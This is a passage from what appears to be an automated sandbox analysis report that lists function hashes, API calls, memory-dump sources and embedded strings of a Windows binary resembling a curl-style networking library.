                                      • Opcode ID: 08c216239d0a58eb61b941a698887df94798d01a762e5711a1fe6c3fc0179cc7
                                      • Instruction ID: 8a9f10a1b7ae8bc4305221351352c3d1a8bb54a2d5c7202672f503ffc881185a
                                      • Opcode Fuzzy Hash: 08c216239d0a58eb61b941a698887df94798d01a762e5711a1fe6c3fc0179cc7
                                      • Instruction Fuzzy Hash: 3D21E321B48A4651F7A0A724A4147F9E3D0AF4D7A4FC84236E97D062EADF3CD00ED294
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                                      • API String ID: 1488884202-564197712
                                      • Opcode ID: 08f22a191100905f7822b2d624702b70d21314b2b1f5d28a843482150cf57912
                                      • Instruction ID: becb94652fa27006fa925a51e8cfc203693f0f45137ca1fd04a07c144e89e4a4
                                      • Opcode Fuzzy Hash: 08f22a191100905f7822b2d624702b70d21314b2b1f5d28a843482150cf57912
                                      • Instruction Fuzzy Hash: 4B11BED5F0568A47DE2893966C12BE4C289AF9CBC0FD49133EC5D0B3E5EE2C62069684
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fseek
                                      • String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                      • API String ID: 623662203-2561564945
                                      • Opcode ID: caf2019e7cfc3d599b45bd4bacc79bbd3d4373e26bbd5a53e8f285c64f87cac3
                                      • Instruction ID: 97a943117200bfceb2c220916879d9a55d20ee54af3ee871c1a49714e3cf00a1
                                      • Opcode Fuzzy Hash: caf2019e7cfc3d599b45bd4bacc79bbd3d4373e26bbd5a53e8f285c64f87cac3
                                      • Instruction Fuzzy Hash: ED21B935A0DA5241FB10AB35A540378E252AF8CFD4F9C1231DD3D4B6D8DF2DD048A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_l
                                      • String ID: $Couldn't use REST$RETR %s$ytes
                                      • API String ID: 2941638530-1937135460
                                      • Opcode ID: 4a2f36407b92beda920e140c02283f0c9783fd13f50ef2abca38f136ab050421
                                      • Instruction ID: d8edafc091fd68ca87da62a5dfd65b22b21390c11e27540e99e6c43e10eb9fb0
                                      • Opcode Fuzzy Hash: 4a2f36407b92beda920e140c02283f0c9783fd13f50ef2abca38f136ab050421
                                      • Instruction Fuzzy Hash: 4721B651D1C68286FB50B724F440379E350AF4C754F845232E9BE4A6D6DF2CE049B7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isdigit$strtol
                                      • String ID:
                                      • API String ID: 2442889181-3916222277
                                      • Opcode ID: 6e8c5eee30e69089a101476ce72cae776836a0bf184691cfcd7e98b65ac4b67b
                                      • Instruction ID: e0ec5fdaa71301214b29020d0c622498e959b7509e9efa251476f9d1eceb0333
                                      • Opcode Fuzzy Hash: 6e8c5eee30e69089a101476ce72cae776836a0bf184691cfcd7e98b65ac4b67b
                                      • Instruction Fuzzy Hash: FCF081A1E0C19283E7646F23E844579F7A19F2CB40F8C8075D67A865D5CE2CD898B778
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_l
                                      • String ID: %s %s$HELP$VRFY
                                      • API String ID: 2941638530-1654406642
                                      • Opcode ID: 8a9aae8bda12b01853152fd3dd486b3ca1ca738dec823351b8ba14d521321738
                                      • Instruction ID: 1e2c0237c1400614ddde98ced20c922dc9a6403b25fb92acae63be1e09381b86
                                      • Opcode Fuzzy Hash: 8a9aae8bda12b01853152fd3dd486b3ca1ca738dec823351b8ba14d521321738
                                      • Instruction Fuzzy Hash: DB011AA1E0868681FB90EB9594407B4E6909F09784F88507BCA3C162D2CF2D948CA3F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F28
                                        • Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F65
                                        • Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F8E
                                        • Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41FA9
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,CONNECT,?,NTLM,00007FF7F8D3D463), ref: 00007FF7F8D41B2C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: CONNECT$NTLM
                                      • API String ID: 2190258309-480531918
                                      • Opcode ID: a96f6467ef4646aecb79114066ea8ede42d1f5e76666e7453fda30a29b6cc788
                                      • Instruction ID: f4fbd6caf81b9fa6a7c2e2a79a2bfdaf6401906c903399852c2d3826546619d6
                                      • Opcode Fuzzy Hash: a96f6467ef4646aecb79114066ea8ede42d1f5e76666e7453fda30a29b6cc788
                                      • Instruction Fuzzy Hash: 52813736609B4686EB20AF26F450369B3A8FB4CB84F884036DE5D43B94DF3CE558D758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isxdigit$freemallocstrtoul
                                      • String ID:
                                      • API String ID: 2287813817-0
                                      • Opcode ID: a03f5e892b60e0cb82254bc35a09ca2ef6c73511c09817b84b48d54ef6aecffd
                                      • Instruction ID: e2a042db0946fc59deff39f2ce689356afdcd0949d30989a0b13c1c07cb715be
                                      • Opcode Fuzzy Hash: a03f5e892b60e0cb82254bc35a09ca2ef6c73511c09817b84b48d54ef6aecffd
                                      • Instruction Fuzzy Hash: B331E421A0CA9585FB15AF72A48423EEB60AF09BA0F880131DABD077D4CE7CD849D764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D23841
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D23917
                                        • Part of subcall function 00007FF7F8D234B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D2351E
                                        • Part of subcall function 00007FF7F8D234B0: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D23535
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D238A8
                                      • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D238E5
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D23903
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _errno$CriticalInitializeSection_beginthreadexcallocfreemalloc
                                      • String ID:
                                      • API String ID: 3298959180-0
                                      • Opcode ID: cb2b70bca1e85bc600e526e80320c77bca3cb222113ca0fc87714bf81190e872
                                      • Instruction ID: 52822b77590c20a1fe77dc08b5c74e2d4ebd5e2eb29a036ee222f03be13ed6ed
                                      • Opcode Fuzzy Hash: cb2b70bca1e85bc600e526e80320c77bca3cb222113ca0fc87714bf81190e872
                                      • Instruction Fuzzy Hash: 30312126609B4582EB18AF12E804769F3A0FF5CB94F888175DE6D073D0DF3CE45997A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$fgetsfreerealloc
                                      • String ID:
                                      • API String ID: 3713276081-0
                                      • Opcode ID: de2c408f1ae50dd1dfe508a6d9571a95ff86dd4fa97b7608efdc7ba73076df94
                                      • Instruction ID: b0a5ea14eacecba45825c4709da2f2011a0d1863cbc2172922f1cf77652a12d9
                                      • Opcode Fuzzy Hash: de2c408f1ae50dd1dfe508a6d9571a95ff86dd4fa97b7608efdc7ba73076df94
                                      • Instruction Fuzzy Hash: 2A31B52260DA8141EB21EF15E4103E9E350FF9CB94F884231D9AD437C5DE3CD509D7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _strdupfgetsfreereallocstrchr
                                      • String ID:
                                      • API String ID: 3499191936-0
                                      • Opcode ID: c29a703ec518f11a0bfd500d9abd81e7f0cd0c87dbd53574296d452f76667be6
                                      • Instruction ID: f49ae99656cc4dc43f7e75dee4b3ceb830b8a8c1f094e9a392e5794d0c8c960c
                                      • Opcode Fuzzy Hash: c29a703ec518f11a0bfd500d9abd81e7f0cd0c87dbd53574296d452f76667be6
                                      • Instruction Fuzzy Hash: 4621A221A0DA8540FB20AB21A4102A9E790EF9CBE0FD85330D9BD037D9DE2CD54A97A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fputs$fwriteisspace
                                      • String ID:
                                      • API String ID: 2170585975-0
                                      • Opcode ID: c906759dea234d2a78e1584ee8e268faab0413231503c2442c7e77a18f09ddd9
                                      • Instruction ID: b6cd585c8ab81d7055417dfb01275b069f69f0f81aa65fa818f2aa6b92c63c6b
                                      • Opcode Fuzzy Hash: c906759dea234d2a78e1584ee8e268faab0413231503c2442c7e77a18f09ddd9
                                      • Instruction Fuzzy Hash: 8C21C162B0995181EB61AB22EC147B9E360BF4CBC4FC90031DD7E4B6C8DE2CD54AD364
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: freerealloc$fread
                                      • String ID:
                                      • API String ID: 913911637-0
                                      • Opcode ID: 2c28d68f64c5e4da846730bb9e2bfaa4390ceb62d7d2a150778f36101ff5d3d0
                                      • Instruction ID: 7379052b2bfe4904c7c3024b91ccd21c48f304a5f29ce3cca1114af391a30c26
                                      • Opcode Fuzzy Hash: 2c28d68f64c5e4da846730bb9e2bfaa4390ceb62d7d2a150778f36101ff5d3d0
                                      • Instruction Fuzzy Hash: E721B321B0EB4142EB11AF52F804169E294EF58FD0F888630DE7E477C9EE7CE4499354
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: tolower
                                      • String ID: ALL_PROXY$_proxy$all_proxy$http_proxy
                                      • API String ID: 3025214199-1845912879
                                      • Opcode ID: 8c3a29744a27511e73f7e1c5eb76e8cf2628a3e5b7c91e8f9198e6f87f733801
                                      • Instruction ID: 5cc7280a8bd62259220b8cd25c301d6424d571e2e45231186fa442aeca64aa3e
                                      • Opcode Fuzzy Hash: 8c3a29744a27511e73f7e1c5eb76e8cf2628a3e5b7c91e8f9198e6f87f733801
                                      • Instruction Fuzzy Hash: 3E21CA21A0DA9584FB15FB20E441379E390AF5C744FC40132DAAC476D6EF2CD54CEBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: Cannot SELECT without a mailbox.$SELECT %s
                                      • API String ID: 1294909896-2454231232
                                      • Opcode ID: 185d97417fad781addb77d552844e189305ce1fffb953b2500ee801ae4347b81
                                      • Instruction ID: f4fa1932ecb3a23f86f9d9c09764649b0eef5ad514a1c3989d0c8561c6bec6de
                                      • Opcode Fuzzy Hash: 185d97417fad781addb77d552844e189305ce1fffb953b2500ee801ae4347b81
                                      • Instruction Fuzzy Hash: AA211225609A4682EB14FF26F450379E360FF48BC0F884031DAAE4B795CF2CE448A398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$malloc
                                      • String ID:
                                      • API String ID: 2541711312-0
                                      • Opcode ID: 8aafb7106ee7b1f1bf542f18ed8eb94f6f7ef5cace4748e3f5d27dbf5c336f86
                                      • Instruction ID: 189d7300605727810968bed619705369b712bcf4201b9df0abfaaa1c69f73944
                                      • Opcode Fuzzy Hash: 8aafb7106ee7b1f1bf542f18ed8eb94f6f7ef5cace4748e3f5d27dbf5c336f86
                                      • Instruction Fuzzy Hash: 90017310A0E68351FB19BB226414179D290AF4DBC4B888470CD6E677D5EE3CE90A63A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: ede2baebea30e120c22f6a2023d50123c2593a40af718a3927acf8066244f778
                                      • Instruction ID: e2bfd222dc19f51d6ae5ec395dff610541f0c3df283c2e36e1a75ad234b7891d
                                      • Opcode Fuzzy Hash: ede2baebea30e120c22f6a2023d50123c2593a40af718a3927acf8066244f778
                                      • Instruction Fuzzy Hash: D8117D22618A45D3D714AF62F9A4329A330FF5CB84F481131CB1E4BA50CF3CE4789798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: recvfrom
                                      • String ID: %s$Internal error: Unexpected packet$Received too short packet
                                      • API String ID: 846543921-1418437813
                                      • Opcode ID: b545d1a479bdb1d52966d8b14be9174759b8c22b51c337696aaa962b0d1850a2
                                      • Instruction ID: 73be6e5e8d733fc2833a5672db730b036e3494ef7227646b04acfde4787d6909
                                      • Opcode Fuzzy Hash: b545d1a479bdb1d52966d8b14be9174759b8c22b51c337696aaa962b0d1850a2
                                      • Instruction Fuzzy Hash: 5851C671A0868285EB50AB25D8103B9F391FF48B95F984232EE6D477C8CF3DD509E7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _time64$ErrorLast
                                      • String ID: TFTP response timeout
                                      • API String ID: 3339832089-3820788777
                                      • Opcode ID: c95d31db132e8219cb1e17eae8e70e8a43aaed46a855f85b39af27bbf35c9912
                                      • Instruction ID: 163842bb5fe8fb9f231a2acec1413866a9e02ad4515950420174676f78693790
                                      • Opcode Fuzzy Hash: c95d31db132e8219cb1e17eae8e70e8a43aaed46a855f85b39af27bbf35c9912
                                      • Instruction Fuzzy Hash: C541AE22A0874285E750EB25E850379E790EF8CBA0F848131DE6D477D5CF3CD445E3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isspace
                                      • String ID: stale$true
                                      • API String ID: 3785662208-3006055996
                                      • Opcode ID: bf108ed8c1bf25e98bd3ce14e0dbbecb5219542823e6cc7ca919c13f066e7f4b
                                      • Instruction ID: a8077525219f7cc1f4bbe16f92744a601868837683a8b447e121dd74a260932e
                                      • Opcode Fuzzy Hash: bf108ed8c1bf25e98bd3ce14e0dbbecb5219542823e6cc7ca919c13f066e7f4b
                                      • Instruction Fuzzy Hash: 3331712150CA4685FFA0AF21A4103B9E390BF08B94FCC5171DAAD476C5DF3CE909A768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
